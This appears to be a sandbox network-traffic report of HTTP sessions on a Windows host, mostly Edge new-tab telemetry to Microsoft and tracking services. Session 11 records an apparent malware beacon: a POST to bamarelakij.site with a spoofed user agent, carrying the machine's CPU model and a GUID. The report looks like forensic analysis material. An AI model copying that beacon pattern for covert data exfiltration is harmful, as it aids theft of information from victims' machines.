Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1

Timestamp: 2025-01-09 13:42:38 UTC | Bytes transferred: 1108 | Direction: IN | Data:
HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: https://c.bing.com/c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DA9A15B01DA04E12909853D03F33D1E9&RedC=c.msn.com&MXFR=0E823CD872A76198161729B773BE609A
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
Set-Cookie: MUID=0E823CD872A76198161729B773BE609A; domain=.msn.com; expires=Tue, 03-Feb-2026 13:42:38 GMT; path=/; SameSite=None; Secure; Priority=High;
Date: Thu, 09 Jan 2025 13:42:38 GMT
Connection: close
Content-Length: 0


Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 50029 | Destination IP: 18.173.219.111 | Destination Port: 443 | PID: 7832 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp: 2025-01-09 13:42:38 UTC | Bytes transferred: 925 | Direction: OUT | Data:
GET /b?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8

Timestamp: 2025-01-09 13:42:38 UTC | Bytes transferred: 955 | Direction: IN | Data:
HTTP/1.1 302 Found
Content-Length: 0
Connection: close
Date: Thu, 09 Jan 2025 13:42:38 GMT
Location: /b2?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
set-cookie: UID=1C82b153708d47b4ae7d1c01736430158; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
set-cookie: XID=1C82b153708d47b4ae7d1c01736430158; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 64d968aa0a0b58a1d00cb142d02b0ac0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P1
X-Amz-Cf-Id: WG4dRpPps6PuqiC4TU4GWX58X3BcMul-OO7tghidP_4GYXlZxUcihg==


Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 50027 | Destination IP: 40.79.167.8 | Destination Port: 443 | PID: 7832 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp: 2025-01-09 13:42:38 UTC | Bytes transferred: 1082 | Direction: OUT | Data:
POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430156622&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 3856
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
Timestamp: 2025-01-09 13:42:38 UTC | Bytes transferred: 3856 | Direction: OUT | Data Raw: (hex dump omitted; decoded prefix follows)
Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T13:42:36.617Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"

Timestamp: 2025-01-09 13:42:39 UTC | Bytes transferred: 890 | Direction: IN | Data:
HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=50154e19c48b4236881c2115b931d48d&HASH=5015&LV=202501&V=4&LU=1736430158946; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:38 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=5817f85e6e974b95913bae971c08cd30; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:38 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2324
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Thu, 09 Jan 2025 13:42:39 GMT
Connection: close


Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 50038 | Destination IP: 18.173.219.111 | Destination Port: 443 | PID: 7832 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp: 2025-01-09 13:42:38 UTC | Bytes transferred: 1012 | Direction: OUT | Data:
GET /b2?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: UID=1C82b153708d47b4ae7d1c01736430158; XID=1C82b153708d47b4ae7d1c01736430158

Timestamp: 2025-01-09 13:42:39 UTC | Bytes transferred: 326 | Direction: IN | Data:
HTTP/1.1 204 No Content
Connection: close
Date: Thu, 09 Jan 2025 13:42:39 GMT
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 078fe53d3a4b452fe5cde4b5d9596b0e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P1
X-Amz-Cf-Id: 6nuSv1aU4LyTTVvv3BtiZfsPAbAhKx-hc0zt8HU843HtR4UBULSpiA==


Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 50057 | Destination IP: 20.110.205.119 | Destination Port: 443 | PID: 7832 | Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp: 2025-01-09 13:42:39 UTC | Bytes transferred: 1271 | Direction: OUT | Data:
GET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DA9A15B01DA04E12909853D03F33D1E9&MUID=0E823CD872A76198161729B773BE609A HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; SM=T; _C_ETH=1

Timestamp: 2025-01-09 13:42:40 UTC | Bytes transferred: 983 | Direction: IN | Data:
HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: image/gif
Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT
Accept-Ranges: bytes
ETag: "dda11c98eb61db1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
Set-Cookie: MUID=0E823CD872A76198161729B773BE609A; domain=.msn.com; expires=Tue, 03-Feb-2026 13:42:39 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                Set-Cookie: SRM_M=0E823CD872A76198161729B773BE609A; domain=c.msn.com; expires=Tue, 03-Feb-2026 13:42:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 13:42:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 13:52:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:39 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Length: 42
                                                                                                                                                                2025-01-09 13:42:40 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 50061 | 104.21.80.52 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:40 UTC | 354 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 147
Host: bamarelakij.site
2025-01-09 13:42:40 UTC | 147 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 4e 2d f0 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzdN-$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:42:40 UTC | 827 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 13:42:40 GMT
Transfer-Encoding: chunked
Connection: close
pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oUTdkQl6UL2K3LhYFGQRVWEXKJoqw%2FczLILXcTySfw1c9q2e5KPB9R1d81fTP4rJ8GJiaXbB55N41TGiRF%2FZMGS7fgXo1p18LpixmnKBHxGwmGD4JjHAsYwLivhuJD5RI7t"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4da173f085e7f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1607&rtt_var=604&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1137&delivery_rate=1810291&cwnd=228&unsent_bytes=0&cid=2e5e57db2071638f&ts=277&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 50060 | 40.79.167.8 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:40 UTC | 1034 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158575&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 11483
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=
2025-01-09 13:42:40 UTC | 11483 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 38 2e 35 37 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:38.573Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"
2025-01-09 13:42:40 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=0d363b20fef248d29d7c0a327fffe90e&HASH=0d36&LV=202501&V=4&LU=1736430160760; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:40 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=8faff2a857dd436fa369e76196994cb8; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:40 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2185
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Thu, 09 Jan 2025 13:42:40 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 50059 | 40.79.167.8 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:40 UTC | 1034 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158586&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 33238
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=
                                                                                                                                                                2025-01-09 13:42:40 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 38 2e 35 38 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 38 36 38 34 39 38 34 2d 37 64 32 34 2d 34 65 38 34 2d 62 61 66 61 2d 62 31 39 30 39 63 61 65 66 31 66 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 34 30 33 31 39 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:38.583Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"b8684984-7d24-4e84-bafa-b1909caef1f2","epoch":"240319591"},"app":{"locale"
                                                                                                                                                                2025-01-09 13:42:40 UTC16384OUTData Raw: 65 67 6f 72 79 22 3a 22 61 6e 74 70 22 2c 22 64 6f 6d 61 69 6e 49 64 22 3a 22 33 34 30 22 2c 22 76 65 72 74 69 63 61 6c 22 3a 22 68 6f 6d 65 70 61 67 65 22 2c 22 74 6f 70 69 63 22 3a 22 44 69 73 63 6f 76 65 72 22 7d 2c 22 69 73 41 64 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 73 41 75 74 6f 52 65 66 72 65 73 68 22 3a 66 61 6c 73 65 2c 22 69 73 4a 53 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 69 73 53 74 61 74 69 63 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 6f 63 69 64 22 3a 22 6d 73 65 64 67 64 68 70 22 2c 22 70 72 6f 64 75 63 74 22 3a 22 61 6e 61 68 65 69 6d 22 2c 22 74 79 70 65 22 3a 22 64 68 70 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 65 64 67 65 2f 6e 74 70 3f
                                                                                                                                                                Data Ascii: egory":"antp","domainId":"340","vertical":"homepage","topic":"Discover"},"isAdEnabled":false,"isAutoRefresh":false,"isJSEnabled":true,"isStatic":false,"name":"default","ocid":"msedgdhp","product":"anaheim","type":"dhp","url":"https://ntp.msn.com/edge/ntp?
                                                                                                                                                                2025-01-09 13:42:40 UTC470OUTData Raw: 6f 67 6f 2d 63 6f 6c 6f 72 2d 62 6c 61 63 6b 2e 73 76 67 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22 2c 22 73 70 61 6e 73 22 3a 7b 22 6e 65 74 77 6f 72 6b 22 3a 5b 38 38 38 37 2c 33 39 37 5d 7d 2c 22 64 75 72 61 74 69 6f 6e 73 22 3a 7b 22 63 6f 6e 6e 65 63 74 22 3a 32 30 33 2c 22 72 65 71 75 65 73 74 22 3a 31 39 34 2c 22 63 64 6e 54 43 50 22 3a 31 38 31 2c 22 63 64 6e 53 65 6c 66 22 3a 30 2c 22 63 64 6e 4f 72 69 67 69 6e 22 3a 30 7d 2c 22 73 63 61 6c 61 72 73 22 3a 7b 22 73 69 7a 65 22 3a 32 30 37 30 2c 22 63 61 63 68 65 22 3a 30 7d 7d 2c 22 5b 63 64 6e 5d 2f 73 74 61 74 69 63 73 62 2f 73 74 61 74 69 63 73 2f 6c 61 74 65 73 74 2f 69 63 6f 6e 73 2d 77 63 2f 69 63 6f 6e 73 2f 66 65 65 64 73 65 74 74 69 6e 67 73 2e 73 76 67 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22
                                                                                                                                                                Data Ascii: ogo-color-black.svg":{"type":"o","spans":{"network":[8887,397]},"durations":{"connect":203,"request":194,"cdnTCP":181,"cdnSelf":0,"cdnOrigin":0},"scalars":{"size":2070,"cache":0}},"[cdn]/staticsb/statics/latest/icons-wc/icons/feedsettings.svg":{"type":"o"
                                                                                                                                                                2025-01-09 13:42:41 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                Set-Cookie: MC1=GUID=35ce28cd45c14bb798e7664a52db2860&HASH=35ce&LV=202501&V=4&LU=1736430160883; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                Set-Cookie: MS0=1ae3face5245438e873cc8dcefbd87fb; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:40 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                time-delta-millis: 2297
                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:40 GMT
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 50062 | 40.79.167.84 | 443 | 7832 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:42:41 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159327&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5379
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1
